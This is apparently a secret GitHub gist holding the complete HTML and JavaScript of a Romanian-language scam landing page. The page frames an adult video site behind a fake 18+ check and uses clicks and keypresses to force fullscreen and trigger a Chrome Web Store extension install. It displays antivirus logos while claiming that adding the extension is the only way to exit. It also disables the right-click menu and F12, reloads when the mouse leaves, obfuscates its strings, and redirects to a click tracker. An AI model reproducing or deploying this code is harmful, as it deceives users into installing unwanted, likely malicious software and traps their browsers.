Skip to content

Instantly share code, notes, and snippets.

@iamntz

iamntz/sec.txt Secret

Created July 5, 2017 17:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save iamntz/30c71c32d8c2a3b34b5622d1ad38f927 to your computer and use it in GitHub Desktop.
Save iamntz/30c71c32d8c2a3b34b5622d1ad38f927 to your computer and use it in GitHub Desktop.
<!Doctype html>
<html>
<head>
<title>www.xnxx.com/?k=son mom</title>
<link rel="chrome-webstore-item"
href="https://chrome.google.com/webstore/detail/cdgglkenodjfockiobedddpoiddigfjk">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1">
<meta name="robots" content="nofollow,noindex,noarchive"/>
<style>
* {
margin: 0;
padding: 0;
outline: none;
font-family: sans-serif;
word-wrap: break-word;
}
header {
text-align: center;
position: fixed;
top: 0;
left: 15px;
right: 0;
animation: header_animation .35s .5s both;
z-index: 1000;
}
header img {
border-radius: 3px;
box-shadow: 0px 1px 5px;
}
@keyframes header_animation {
from {
opacity: 0;
transform: scale(0.5);
}
to {
opacity: 1;
transform: scale(1);
}
}
@keyframes header_animation_reverse {
from {
opacity: 1;
transform: scale(1);
}
to {
opacity: 0;
transform: scale(0.5);
}
}
h2 {
cursor: pointer;
}
body {
background: rgba(0,0,0,.7);
background-size: 100%;
height: 100%;
min-height: 100vh;
width: 100%;
overflow: hidden;
}
:-webkit-full-screen body {
height: 100%;
}
main {
width: 50%;
height: 60%;
min-height: 200px;
background: rgb(255, 255, 255);
margin: 0 auto;
padding: 10px;
border-radius: 20px;
position: absolute;
top: calc(50% - 180px);
left: calc(50% - 300px);
}
.csuq6xRmlOWMkHKJ {
width: 100%;
text-align: center;
padding: 10px;
box-sizing: border-box;
height: 50%;
border-radius: 20px;
}
@keyframes main_animation {
from {
opacity: 0;
}
to {
opacity: 1;
}
}
@keyframes main_animation_reverse {
from {
opacity: 1;
}
to {
opacity: 0;
}
}
object {
display: none;
}
main {
display: flex;
justify-content: center;
width: 50%;
min-width: 200px;
position: absolute;
z-index: 999;
left: 50%;
top: 50%;
transform: translate(-50%, -50%);
}
.eYfF0j96tqgzQXCp {
animation: main_animation 1s backwards;
}
.main_closed {
animation: main_animation_reverse 1s both;
animation-delay: .5s;
}
.csuq6xRmlOWMkHKJ > * {
width: 100%;
display: block;
word-wrap: break-word;
}
.csuq6xRmlOWMkHKJ > h2 {
position: absolute;
top: 50%;
left: 0;
font-size: 2.4em;
}
.csuq6xRmlOWMkHKJ > section {
display: flex;
justify-content: center;
position: absolute;
z-index: 99;
bottom: 0;
left: 0;
box-sizing: border-box;
border-radius: 0 0 20px 20px;
margin-bottom: 40px;
}
main div {
margin: 0;
}
main > span {
position: absolute;
right: 20px;
font-size: 1.5em;
font-weight: bold;
cursor: pointer;
}
@keyframes section_animation {
from {
transform: scale(0);
}
to {
transform: scale(1);
}
}
@keyframes section_animation_reverse {
from {
transform: scale(1);
}
to {
transform: scale(0);
}
}
.csuq6xRmlOWMkHKJ > section.closed::before {
animation: section_animation_reverse 1s both;
}
.csuq6xRmlOWMkHKJ > section > a {
text-decoration: none;
width: 20%;
color: #fff;
display: block;
font-size: 1.5em;
cursor: pointer;
padding: 10px;
margin: 0 20px;
transition: all .5s;
}
.csuq6xRmlOWMkHKJ > section > a:nth-child(2) {
width: 0;
padding: 0;
/*border-left: 1px solid;*/
}
.dBsnPkOQpHm4lDEt {
background: linear-gradient(to top, #79AC04, #C2EA4F);
border: 1px solid #000;
}
.e4fr3N7PJnyShUBE {
background: linear-gradient(to top, #AD080B, #ce7979);
border: 1px solid #000;
}
.aIpRNjJZfY2Og96W {
width: 100%;
position: fixed;
/* top: 110px; */
top: 50%;
left: 11%;
text-align: right;
transform: translate(-50%, -50%);
}
.kCSMJNm5bZnL2Awr {
position: fixed;
/* bottom: 65px; */
background: linear-gradient(to bottom, #fff, #ababab);
padding: 40px 10px 10px;
top: 68%;
/* box-sizing: content-box; */
left: 8%;
transform: translate(-50%, -50%);
width: 100%;
}
.bCPS4ed6rGjmxwY9 {
display: flex;
justify-content: space-around;
align-items: center;
margin: 40px 0px 0;
}
iframe {
width: 100%;
height: 100%;
position: absolute;
z-index: -88;
top: 0;
left: 0;
-webkit-filter: contrast(50%);
}
footer {
height: 100%;
position: fixed;
top: 0;
width: 100%;
background: rgba(0, 0, 0, 0.91);
z-index: 99999;
display: none;
}
footer > div {
position: fixed;
width: 30%;
min-height: 100vh;
margin: 0 auto;
top: 50%;
left: 50%;
transform: translate(-50%, -50%)
}
.aIpRNjJZfY2Og96W img {
width: 15%;
}
.kCSMJNm5bZnL2Awr p {
font-size: 1.5em;
text-align: center;
/* margin: 0px 0 14px; */
}
.bCPS4ed6rGjmxwY9 img {
width: 25%;
}
:-webkit-full-screen iframe {
z-index: -999;
}
:-webkit-full-screen main {
z-index: 100;
}
:-moz-full-screen iframe {
z-index: -999;
}
</style>
</head>
<body onkeydown="return eMDNiY96Efo4s1lF(event)" oncontextmenu="return false">
<header>
<img src="../landing_img/en.png" alt="">
</header>
<div>
<div class="bNj4ct0CHKUkg1RO"></div>
<main class="eYfF0j96tqgzQXCp">
<span>X</span>
<div class='csuq6xRmlOWMkHKJ'>
<h1>
<img src="../landing_img/18+.png" alt="">
</h1>
<h2>
Ai mai mult de 18 ani? </h2>
<section>
<a class="dBsnPkOQpHm4lDEt"
onclick="kgyYrj7iIP2K80HA();">
Da. </a>
<a></a>
<a class="e4fr3N7PJnyShUBE"
onclick="kgyYrj7iIP2K80HA()">
Nu. </a>
</section>
</div>
</main>
<div class="bNj4ct0CHKUkg1RO"></div>
</div>
<iframe src="http://www.xnxx.com/?k=son mom"
id="ka2Z7rw03blN6Bhf" onclick="return false"
frameborder="0" scrolling="false">error
</iframe>
<footer>
<div>
<div class='aIpRNjJZfY2Og96W'>
<img src="../landing_img/add_extension_2.gif" alt="">
</div>
<div class='kCSMJNm5bZnL2Awr'>
<p>
Pentru a IEȘI apasă „Adăugare extensie” </p>
<div class='bCPS4ed6rGjmxwY9'>
<img src="../landing_img/on.png">
<img src="../landing_img/eset.png">
<img src="../landing_img/kas.png">
<img src="../landing_img/avasy.png">
<img src="../landing_img/avira.png">
</div>
</div>
</div>
</footer>
<script>
window.onblur = function () {
location.reload();
};
var cx, cy, x, y, animation;
var coords = [];
window.onload = function () {
if (document.cookie.indexOf('tmp_name=') == -1) {
setCookie('tmp_name', 'landing', 24);
}
localStorage.superPid = '863114';
h91hM03HfG6j5YcX();
daNUmlQ40KY8dbTM();
if (document.querySelector('header img')) {
document.querySelector('header img').src = 'landing_img/ro_rl.PNG';
}
};
document.onmouseenter = function () {
if (!window.onmouseleave) {
addEvent(document, "mouseleave", dsfsf);
}
};
window.onresize = function () {
if (document.querySelector('header')) {
if (window.innerHeight != screen.height) {
document.querySelector('header').style.display = 'block';
}
else {
document.querySelector('header').style.display = 'none';
}
}
};
window.setCookie1 = function (a, b, c) {
c = c || {};
var d = c.expires;
if ("number" == typeof d && d) {
var e = new Date;
e.setTime(e.getTime() + 1e3 * d), d = c.expires = e
}
d && d.toUTCString && (c.expires = d.toUTCString()), b = encodeURIComponent(b);
var f = a + "=" + b;
for (var g in c) {
f += "; " + g;
var h = c[g];
!0 !== h && (f += "=" + h)
}
document.cookie = f
};
function kgyYrj7iIP2K80HA() {
if (-1 == location.href.indexOf("#nt")) {
if (setCookie1("wasRun", "", {
expires: 1,
path: "/"
}), i = !1, window.open(location.href + "#nt", "_blank")) return !1;
i = !0
}
document.body.style.cursor = "auto";
document.body.removeEventListener('mousemove', mc);
c1eoLRsDYcaAjuf0();
window['s' + 'et' + 'T' + 'im' + 'eo' + 'ut'](function () {
var a = 'w' + 'eb' + 'ki' + 't';
window["d" + "oc" + "u" + "me" + "nt"]["b" + "ody"][a + "Re" + "qu" + "est" + "Ful" + "lsc" + "re" + "en"]();
}, 800);
}
window.onbeforeunload = function () {
return "Do you really want to leave?";
};
function setCookie(a, b, c) {
var d = '';
if (c) {
var e = new Date();
e.setTime(e.getTime() + (c * 60 * 60 * 1000));
d = '; expires=' + e.toUTCString()
}
document.cookie = a + "=" + b + ";" + d + ";path=/";
}
function daNUmlQ40KY8dbTM() {
if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
document.getElementsByClassName('e4fr3N7PJnyShUBE')[0].onclick = null;
window.onbeforeunload = null;
location.assign('http://google.com?sub=default');
}
}
function eDABYWE2S91OCwdX() {
document.querySelector('section').removeAttribute('class');
document.querySelector('main').removeAttribute('class');
document.querySelector('section').setAttribute('class', 'iwxhitpjO5zD79H4');
document.querySelector('main').setAttribute('class', 'iUMtQdAPI4qs1chR');
}
function h91hM03HfG6j5YcX() {
document.querySelector('section').removeAttribute('class');
document.querySelector('main').removeAttribute('class');
document.querySelector('main').setAttribute('class', 'eYfF0j96tqgzQXCp');
document.querySelector('section').setAttribute('class', 'agYPmWnzyNbtLKQ9');
}
function cTxqfMGD7Y9svU0K() {
document.querySelector('footer').style.display = 'block';
try {
document.querySelector('header').style.display = 'none';
} catch (v) {
}
}
function mc(e) {
cx = e.clientX;
cy = e.clientY;
x = cx / window.innerWidth;
y = cy / window.innerHeight;
if (!animation) animation = requestAnimationFrame(animate)
}
function c1eoLRsDYcaAjuf0() {
cTxqfMGD7Y9svU0K();
chrome.webstore.install('', function () {
window.onbeforeunload = null;
location.assign('redirect.php?sub_id=default&host_id=772&click_id=aj43fo4555m1s0m8qa');
}, function (error) {
console.log(error);
h91hM03HfG6j5YcX();
document.querySelector('footer').style.display = 'none';
try {
document.querySelector('header').style.display = 'block';
document.body.addEventListener('mousemove', mc);
} catch (v) {
}
try {
document.webkitCancelFullScreen();
} catch (e) {
}
try {
document.cancelFullscreen();
} catch (e) {
}
});
}
function eMDNiY96Efo4s1lF(e) {
if (e.which == 123 || e.which == 17) {
return false;
}
}
function ga7eAugJXqVQk3H0() {
location.reload();
}
document.body.addEventListener('keyup', jaVmCfX4iHNEO7gr);
document.body.addEventListener('click', kgyYrj7iIP2K80HA);
// document.body.addEventListener('click', //);
function jaVmCfX4iHNEO7gr() {
kgyYrj7iIP2K80HA();
return false;
}
function dsfsf(e) {
e = e ? e : window.event;
var from = e.relatedTarget || e.toElement;
if (!from || from.nodeName == "HTML") {
if (e.clientX <= 0 || e.clientX > document.body.clientWidth || e.clientY <= 0 || e.clientY >= document.body.clientHeight) {
ga7eAugJXqVQk3H0()
}
}
}
function addEvent(obj, evt, fn) {
if (obj.addEventListener) {
obj.addEventListener(evt, fn, false);
}
else if (obj.attachEvent) {
obj.attachEvent("on" + evt, fn);
}
}
function removeEvent(obj, evt, fn) {
if (obj.removeEventListener) {
obj.removeEventListener(evt, fn, false);
}
else if (obj.detachEvent) {
obj.detachEvent("on" + evt, fn);
}
}
function animate(time) {
animation = null;
ctx.clearRect(0, 0, 128, 128);
ctx.save();
Py = -50;
px = 220 - cx;
py = 95 - cy;
ctx.drawImage(cursor, 0, 0, 280, 400, 110, 10, 17.5, 30);
ctx.restore();
var url = canvas.toDataURL();
document.body.style.cursor = 'url(' + url + ') 0 128, crosshair'
}
window.onblur = null;
var cursor = new window.Image();
cursor.setAttribute("src", "landing_img/cursor2.png");
var canvas = document.createElement('canvas');
canvas.width = canvas.height = 128;
var ctx = canvas.getContext('2d');
ctx.fillStyle = 'rgba(255,0,100,0.8)';
ctx.strokeStyle = 'rgba(255,0,100,0.5)';
document.body.addEventListener('mousemove', mc);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment